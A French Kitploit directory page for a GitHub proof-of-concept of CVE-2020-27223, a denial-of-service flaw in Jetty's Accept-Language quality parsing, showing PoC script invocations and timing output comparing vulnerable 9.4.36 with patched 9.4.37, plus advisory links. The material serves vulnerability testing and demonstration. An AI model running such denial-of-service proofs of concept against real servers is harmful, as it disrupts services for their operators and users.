Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-27223 — CVE-2020-27223 Application de vulnérabilité et PoC | Kitploit
Outils/GitHubGitHub/motikan2010/cve-2020-27223
Analyse des VulnérabilitésExploitationSécurité WebTests d'Intrusion
GitHubmotikan2010/cve-2020-27223

CVE-2020-27223

CVE-2020-27223 Application de vulnérabilité et PoC

Voir le dépôt
3il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-27223

Utilisation

$ mvn spring-boot:run

9.4.36.v20210114

$ ./poc/cve-2020-27223-poc1.sh
{"time_ns":"58,557","accept_language":"aab"}
real	0m0.093s 🐇
user	0m0.006s
sys	0m0.007s
{"time_ns":"18,461,763,438","accept_language":"ahn"}
real	0m35.339s 🐢
user	0m0.006s
sys	0m0.006s

9.4.37.v20210219 (Corrigé)

$ ./poc/cve-2020-27223-poc1.sh
{"time_ns":"36,675","accept_language":"aab"}
real	0m0.023s 🐇
user	0m0.005s
sys	0m0.007s
{"time_ns":"1,265,004","accept_language":"ahn"}
real	0m0.024s 🐇
user	0m0.006s
sys	0m0.006s

PoC

$ ./poc/cve-2020-27223-poc2.sh
curl: (28) Operation timed out after 120000 milliseconds with 0 bytes received

real	2m0.025s
user	0m0.016s
sys	0m0.009s

Références

  • Vulnérabilité DOS pour les en-têtes CSV avec qualité citée · Avis · eclipse/jetty.project
  • Fusionner la demande de tirage de GHSA-m394-8ww-3jr7 · eclipse/jetty.project@10e5317
Télécharger l’outil